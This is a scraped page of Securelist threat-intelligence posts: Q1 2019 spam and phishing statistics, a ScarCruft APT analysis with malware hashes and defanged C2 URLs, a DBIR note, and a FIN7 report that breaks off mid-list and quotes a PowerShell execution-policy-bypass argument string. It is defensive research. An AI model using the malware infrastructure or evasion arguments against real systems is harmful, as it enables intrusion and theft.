Kaspersky Securelist

Syndikovat obsah Securelist
Aktualizace: 20 min 42 sek zpět

Spam and phishing in Q1 2019

15 Květen, 2019 - 12:00

Quarterly highlights Valentine’s Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.

New Apple products

Late March saw the unveiling of Apple’s latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Growth in the number of attempts to redirect users to phishing Apple sites before the presentation (download)

Fake Apple ID login pages

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.

Fake “Kaspersky Lab support service” accounts

All these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. Not only do users not have their issue resolved, they are likely to be defrauded as well.

New Instagram “features”

Last year, we wrote that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full — not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.

As usual in such schemes, the “buyer” is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.

Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

“Dream job” offers from spammers

In Q3, we registered spam messages containing “dream job” offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the “cloud service,” the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim’s machine.

Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of “sextortion” — a topic we wrote about last year.

In Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.

The fictitious employee, whose name varied from message to message, claimed to have found the victim’s details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the “employee” happened to know that the victim was a well-off individual with a reputation to protect — for which a payment of 10,000 dollars in bitcoin was demanded.

Playing on people’s fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.

Malicious attacks on the corporate sector

In Q1, the corporate sector of the Runet was hit by a malicious spam attack. The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.

We also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.

Attacks on the banking sector

Banks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender’s address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message — for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. The email itself stated that the bank had introduced some new security features that required an update of the account details to use.

The link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.

Statistics: spam Proportion of spam in mail traffic

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in global mail traffic, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Proportion of spam in Runet mail traffic, Q4 2018 – Q1 2019 (download) (download)

Peak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.

Sources of spam by country

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, Q1 2019 (download) (download)

As is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). The Top 10 is rounded off by Vietnam (2.18%).

Spam email size

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam email size, Q4 2018 – Q1 2019 (download) (download)

In Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2–5 KB messages fell to 8.27% (down 3.15 p.p.). 10–20 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20–50 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).

Malicious attachments: malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

TOP 10 malicious families in mail traffic, Q1 2019 (download) (download)

In Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.

Countries targeted by malicious mailshots

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, Q1 2019 (download) (download)

First place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.

Statistics: phishing

In Q1 2019, the Anti-Phishing system prevented 111,832,308 attempts to direct users to scam websites. 12.11% of all Kaspersky Lab users worldwide experienced an attack.

Attack geography

In Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of phishing attacks, Q1 2019 (download) (download)

In second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.

Country %* Brazil 21.66 Australia 17.20 Spain 16.96 Portugal 16.81 Venezuela 16.72 Greece 15.86 Albania 15.11 Ecuador 14.99 Rwanda 14.89 Georgia 14.76

*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country

Organizations under attack

The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

This quarter, the banking sector remains in first place by number of attacks — the share of attacks on credit organizations increased by 5.23 p.p. against Q4 last year to 25.78%.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subjected to phishing attacks by category, Q1 2019 (download) (download)

Second place went to global Internet portals (19.82%), and payment systems — another category that includes financial institutions — finished third (17.33%).

Conclusion

In Q1 2019, the average share of spam in global mail traffic rose by 0.06 p.p. to 55.97%, and the Anti-Phishing system prevented more than 111,832,308 redirects to phishing sites, up 35,220,650 in comparison with the previous reporting period.

As previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away — on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.

On top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.

ScarCruft continues to evolve, introduces Bluetooth harvester

13 Květen, 2019 - 12:00

Executive summary

After publishing our initial series of blogposts back in 2016, we have continued to track the ScarCruft threat actor. ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula. The threat actor is highly skilled and, by all appearances, quite resourceful.

We recently discovered some interesting telemetry on this actor, and decided to dig deeper into ScarCruft’s recent activity. This shows that the actor is still very active and constantly trying to elaborate its attack tools. Based on our telemetry, we can reassemble ScarCruft’s binary infection procedure. It used a multi-stage binary infection to update each module effectively and evade detection. In addition, we analyzed the victims of this campaign and spotted an interesting overlap of this campaign with another APT actor known as DarkHotel.

Multi-stage binary infection

The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises (SWC). As in Operation Daybreak, this actor performs sophisticated attacks using a zero-day exploit. However, sometimes using public exploit code is quicker and more effective for malware authors. We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign.

In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted.

Multi-stage binary infection

The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. This cloud service-based backdoor contains many features. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose. The malware creates 11 threads simultaneously: six threads are responsible for stealing information from the infected host, and five threads are for forwarding collected data to four cloud services (Box, Dropbox, Pcloud and Yandex). When uploading stolen data to a cloud service, it uses predefined directory path such as /english, /video or /scriptout.

Cloud-based backdoor

The same malware contains full-featured backdoor functionality. The commands are downloaded from the /script path of a cloud service provider and the respective execution results are uploaded to the /scriptout path. It supports the following commands, which are enough to fully control the infected host:

  • Get File/Process listing
  • Download additional payload and execute
  • Execute Windows command
  • Update configuration data including cloud service token information
  • Save screenshot and an audio recording

The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration. During our research, we confirmed that they have an interest in mobile devices.

We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester. This malware is responsible for stealing Bluetooth device information. It is fetched by a downloader, and collects information directly from the infected host. This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information.

  • Instance Name: Name of device
  • Address: Address of device
  • Class: Class of the device
  • Connected: Whether the device is connected(true or false)
  • Authenticated: Whether the device is authenticated(true or false)
  • Remembered: Whether the device is a remembered device(true or false)

The attackers appear to be increasing the scope of the information collected from victims.

Build path of Bluetooth information harvester

Victimology

We have found several victims of this campaign, based on our telemetry – investment and trading companies in Vietnam and Russia. We believe they may have some links to North Korea, which may explain why ScarCruft decided to closely monitor them. ScarCruft also attacked a diplomatic agency in Hong Kong, and another diplomatic agency in North Korea. It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes.

Victimology of this campaign

Overlap with other actors

We discovered one victim from Russia that also triggered a malware detection while staying in North Korea in the past. The fact that this victim visits North Korea makes its special and suggests that it may have valuable information about North Korean affairs. ScarCruft infected this victim on September 21, 2018. But before the ScarCruft infection, however, another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26, 2018.

GreezeBackdoor is a tool of the DarkHotel APT group, which we have previously written about. In addition, this victim was also attacked by the Konni malware on 03 April 2018. The Konni malware was disguised as a North Korean news item in a weaponized documents (the name of the document was “Why North Korea slams South Korea’s recent defense talks with U.S-Japan.zip”)

Infection timeline

This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors. Members from our team have already presented on the conflict of these two threat actors at security conferences. We have also shared more details with our threat intelligence customers in the past. They are both Korean-speaking threat actors and sometimes their victimology overlaps. But both group seem to have different TTPs (Tactics, Techniques and Procedures) and it leads us to believe that one group regularly lurks in the other’s shadow.

Conclusions

The ScarCruft has shown itself to be a highly-skilled and active group. It has a keen interest in North Korean affairs, attacking those in the business sector who may have any connection to North Korea, as well as diplomatic agencies around the globe. Based on the ScarCruft’s recent activities, we strongly believe that this group is likely to continue to evolve. For more information please contact: intelreports@kaspersky.com

Appendix I – Indicators of Compromise File hashes (malicious documents, Trojans, emails, decoys)

ScarCruft tools

  • 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester
  • C781f5fad9b47232b3606e4d374900cd Installer
  • 032ed0cd234f73865d55103bf4ceaa22 Downloader
  • 22aaf617a86e026424edb7c868742495 AV Remover
  • 07d2200f5c2d03845adb5b20841faa94 AV Remover
  • 1f5ac2f1744ed9c3fd01fe72ee8d334f Initial Dropper
  • 4d20f7311f4f617104f559a04afd2fbf Installer
  • 03e5e566c1153cb1d18b8bc7c493025f Downloader
  • C66ef71830341bb99d30964a8089a1fc Loader
  • 5999e01b83aa1cc12a2ad6a0c0dc27c3 Installer
  • 4d3c34a3070643c225be1dbbb3457ad4 Injector
  • 0790F1D7A1B9432AA5B8590286EB8B95 Downloader
  • 04371bf88b598b56691b0ad9da08204b Installer
  • e8b23cfc805353f55ed67cf0af58f305 UAC bypass(UACME)
  • 5380a173757e67d9b12f316771012768 Installer
  • Ec0e77b57cb9dd7a04ab6e453810937c Downloader
  • 25701492a18854ffdb05317ec7d19c29 Installer
  • 172b4dc27e41e4a0c84a803b0b944d3e UAC bypass(UACME)
  • 7149c205d634c4d17dae33fffb8a68ab Image file embedded ROKRAT
  • A76c4a79e6ff73bfd7149a49852e8916 ROKRAT
  • F63fc2d11fcebd37be3891def5776f6c Dropper
  • 899e90a0851649a5c270d1f78baf60f2 Simple HTTP Downloader
  • E88f7f285163d0c080c8d3e525b35ab3 Simple HTTP Downloader
  • D7c94c5ba028dc22a570f660b8dee5b9 Simple HTTP Downloader
  • A6bd2cf7bccf552febb8e8347d07529a Simple HTTP Downloader
  • 7a338d08226f5a38353385c8a5dec746 Simple HTTP Downloader
  • 46F66D2D990660661D00F5177306309C Simple HTTP Uploader

GreezaBackdoor of DarkHotel

  • 5e0e11bca0e94914e565c1dcc1ee6860

Konni

  • 4c2016df6b546326d67ac2a79dea1343
URLs
  • http://34.13.42[.]35/uploads/1.jpg
  • http://34.13.42[.]35/uploads/2.jpg
  • http://34.13.42[.]35/uploads/qwerty.jpg
  • http://34.13.42[.]35/uploads/girl.jpg
  • http://34.13.42[.]35/uploads/girllisten.jpg
  • https://34.13.42[.]35/uploads/newmode.php
  • http://acddesigns.com[.]au/demo/red/images/slider-pic-6.jpg
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/image/index.php
  • http://kmbr1.nitesbr1[.]org/UserFiles/File/images.png
  • http://www.stjohns-burscough[.]org/uploads/images.png
  • http://lotusprintgroup[.]com/images.png
  • https://planar-progress.000webhostapp[.]com/UserFiles/File/image/image/girl.jpg
  • https://planar-progress.000webhostapp[.]com/userfiles/file/sliderpic.jpg
  • http://www.jnts1532[.]cn/phpcms/templates/default/message/bottom.jpg
  • http://www.rhooters[.]com/bbs/data/m_photo/bottom.jpg
  • https://buttyfly.000webhostapp[.]com/userfiles/file/sliderpic.jpg
Domains and IPs
  • buttyfly.000webhostapp[.]com
  • planar-progress.000webhostapp[.]com
  • 120.192.73[.]202
  • 180.182.52[.]76

The 2019 DBIR is out

8 Květen, 2019 - 22:23

Once again, we are happy to support a large, voluntary, collaborative effort like the 2019 Data Breach Investigations Report. While our data contribution is completely anonymous, it is based in some of the 2018 data set that our private report customers receive from our efforts to protect all of our customers against every type of malware threat regardless of its source.

In general, the report is an excellent point of reference because it is sourced from so many organizations handling various incidents. This year, the Public Administration sector tops the list by far in terms of reported incidents and data along with the Information sector. “Cyber-Espionage is rampant in the Public sector, with State-affiliated actors accounting for 79 percent of all breaches involving external actors” and “Web applications are targeted with availability attacks as well as leveraged for access to cloud-based organizational email accounts.” Small businesses made up 43% of the reported DBIR breach victims in 2018.

“Use 2FA” is a common refrain throughout the report, along with “squish the phish”. Both two factor authentication and phishing awareness, training, and handling can go a long ways toward improving security in all organizations.

Enjoy another fine read this year!

FIN7.5: the infamous cybercrime rig “FIN7” continues its activities

8 Květen, 2019 - 12:00

On August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.

In 2018-2019, researchers of Kaspersky Lab’s Global Research and Analysis Team analyzed various campaigns that used the same Tactics Tools and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.

Recent FIN7 campaigns

The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a vast number of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.

Malicious Documents

We have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim’s computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as “12345”, “1234”, etc., uses macros to execute a GRIFFON implant on the target’s computer. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.

Interestingly, following some open-source publications about them, the FIN7 operators seems to have developed a homemade builder of malicious Office document using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. Moreover, the builder allows these to modify different IOCs, such as the filenames of wscript.exe or sctasks.exe copies, etc.

wscript.exe copy sctasks copy Task name C2 byzNne10.exe byzNne17.exe TaskbyzNne logitech-cdn.com c9FGG10.exe c9FGG17.exe Taskc9FGG logitech-cdn.com zEsb10.exe zEsb17.exe TaskzEsb servicebing-cdn.com

IOCs extracted from docs which use sctasks for GRIFFON persistence

Author Company wscript.exe copy C2 mogjxjtvte mogjxjtvte mswmex44.exe logitech-cdn[.]com soxvremvge soxvremvge c9FGG10.exe logitech-cdn[.]com gareljtjhvd gareljtjhvd zEsb10.exe servicebing-cdn[.]com

IOCs extracted from regular documents associated to GRIFFON

GRIFFON Implant

Griffon Malware attack pattern

The GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. We were able to obtain four different modules during the investigation.

Reconnaissance module

The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module mainly relies on WMI and Windows objects to deliver results, which will be sent back to the operators. Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the date and time of operating system installation and membership in a Windows domain to a list of and the resolutions of the workstation’s monitors.

Meterpreter downloader

The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as “Tinymet“. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute.

Screenshot module

The third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at “%TMP%/image.png”, sent back to the attackers by the GRIFFON implant and then deleted.

Persistence module

The last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method.

Through its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation.

On the hunt for GRIFFON infrastructure

Attackers make mistakes, and FIN7 are no exception. The major error made by its operators allowed us to follow the command and control server of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirection to various Google services on their C2s servers.

HTTP/1.1 302 Found Server: nginx Date: [retracted] Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Location: https://cloud.google.com/cdn/

Returned headers for most of the GRIFFON C2s servers on port 443

This error allowed us to follow the infrastructure week by week, until an individual pushed on Twitter the heuristic to track their C2 at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.

Fake pentest company

During the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.

According to the website, that domain supposedly belongs to a legitimate security company “fully owned by the Russian Government” (sic.) and having offices in “Moscow, Saint Petersburg and Yekaterinburg”, but the address says the company is located in Trump Tower, in New York. Given FIN7’s previous use of false security companies, we decided to look deeper into this one.

As we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. Phrases and sentences were borrowed from at least the following companies/sites:

  • DKSec – www.dksec.com
  • OKIOK – www.okiok.com/services/tailored-solutions
  • MainNerve – www.mainnerve.com
  • Datics – www.datatics.com/cyber-security
  • Perspective Risk – www.perspectiverisk.com
  • Synack – https://www.synack.com/company
  • FireEye – https://www.fireeye.com/services/penetration-testing.html

This company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.

In addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.

Links to other intrusion sets

While tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.

CobaltGoblin/EmpireMonkey

In his history, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks. After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.

FIN7’s last campaigns were targeting banks in Europe and Central America. This threat actor stole suspected of stealing €13 million from Bank of Valetta, Malta earlier this year.

Example of malicious documents used in the end of 2018 to beginning of 2019

A few interesting overlaps in recent FIN7 campaigns:

  • Both used macros to copy wscript.exe to another file, which began with “ms” (mses.exe – FIN7, msutil.exe – EmpireMonkey).
  • Both executed a JScript file named “error” in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).
  • Both used DocuSign decoy documents with different macros. The macros popped the same “Document decryption error” error message—even if macro code remain totally different.

We have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.

AveMaria

AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.

To deliver their malware, the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882, or documents with Ole2Link and SCT. They also use AutoIT droppers, password-protected EXE files and even ISO images. What is interesting, in some emails, they ask targets to phone them if they have any questions, like the FIN7 guys do.

Example of AveMaria spearphing emails. Criminals suggest calling them.

During the investigation into FIN7, our threat-hunting systems found an interesting overlap in between the infrastructure of FIN7 and AveMaria. Basically, two servers in the same IP range and AS14576 (autonomous system) share a non-standard SSH port, which is 222. One of the servers is a Griffon C2, and the other one, an AveMaria C2.

Distribution of targets is another factor suggesting that these two malware families may be connected. We analyzed AveMaria targets during February and March of 2019. The spearphishing emails were sent to various kinds of businesses only and did not target individuals. Thirty percent of the targets were small and medium-sized companies that were suppliers or service providers for bigger players and 21% were various types of manufacturing companies. We also spotted several typical FIN7 targets, such as retailers and hotels. Most AveMaria targets (72%) were in the EU.

CopyPaste

At the end of 2018, while searching for new FIN7 campaigns via telemetry, we discovered a set of activity that we temporarily called “CopyPaste” from a previously unknown APT. Interestingly, this actor targeted financial entities and companies in one African country, which lead us to think that CopyPaste was associated with cybermercenaries or a training center.

This set of activity relied on open-source tools, such as Powershell Empire, and well-documented red teaming techniques, in order to get a foothold within the victim’s networks and avoid detection.

Here are the main similarities between CopyPaste and FIN7:

  • Both used the same Microsoft PowerShell argument obfuscation order: “powershell.exe -NoP -NonI -ExecutionPolicy Bypass”. We have only seen FIN7 and CopyPaste use this argument list for executing their malicious Powershell Scripts.
